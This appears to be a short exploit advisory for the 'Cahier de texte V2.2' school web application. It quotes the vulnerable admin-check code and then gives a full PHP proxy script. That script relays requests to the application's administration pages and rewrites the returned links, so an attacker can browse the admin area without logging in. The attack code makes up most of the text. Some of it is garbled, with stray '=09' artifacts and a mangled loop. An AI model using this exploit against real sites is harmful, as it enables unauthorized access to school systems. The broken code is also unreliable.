www.etab.ac-caen.fr/bsauveur/cahier_de_texte/
Poc.link......: acid-root.new.fr/poc/17061224.txt
Credits.......: DarkFig
Vulnerable code
============== 'Administrateur') { header("Location: ../index.php");}
;} else { header("Location: ../index.php");}?>
...
*/
if(!isset($_GET['host']) || empty($_GET['host'])) headers();
if(!isset($_GET['wanted'])) $wanted = 'index.php';
$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];
echo sockxp($host,$path,$prox,"administration/".$wanted);
exit(0);
function headers()
{
print("
Cahier de texte V2.2 Exploit
");
exit(0);
}
function sockxp($host,$path,$prox,$wanted)
{
$hope = !empty($prox) ? $prox : $host.':80';
preg_match("/^(\S*):([0-9]+){1,5}/",$hope,$hosta);
$hosh = $hosta[1];
$hosp = $hosta[2];
=09
$recv = '';
$meth = $_SERVER['REQUEST_METHOD'];
if(empty($hosh) || empty($hosp)) exit(1);
if(!$sock = fsockopen($hosh,$hosp)) exit(1);
$dat = $meth." http://".$host;
=09
if($meth === "POST") $dat .= "/".str_replace("administration//","",$wanted);
else $dat .= $path.$wanted;
=09
$dat .= " HTTP/1.1\r\n";
$dat .= "Host: $host\r\n";
$dat .= "Connection: Close\r\n";
=09
if($meth === "POST") {
$postdata = get_postdata();
$dat .= "Content-Type: application/x-www-form-urlencoded\r\n";
$dat .= "Content-Length: ".strlen($postdata)."\r\n\r\n";
$dat .= $postdata."\r\n\r\n";
} else {
$dat .= "\r\n";
}
fputs($sock,$dat);
while(!feof($sock)) $recv .= fgets($sock);
fclose($sock);
return html_replace($recv);
}
function html_replace($htmlc)
{
global $host,$path,$prox;
$iniv = $_SERVER['PHP_SELF']."?host=$host&path=$path&prox=$prox&wanted=";
$newc = str_replace("action=\"","action=\"$iniv",$htmlc);
$newc = str_replace("=\"..","=\"http://${host}${path}administration/..",$newc);
$newc = str_replace("a href=\"","a href=\"$iniv",$newc);
$newc = str_replace("MM_goToURL('parent','","MM_goToURL('parent','$iniv",$newc);
$newc = explode("\n",$newc);
for($i=0;$i $value) {
$postdata .= $key."=".$value."&";
}
return $postdata;
}
?>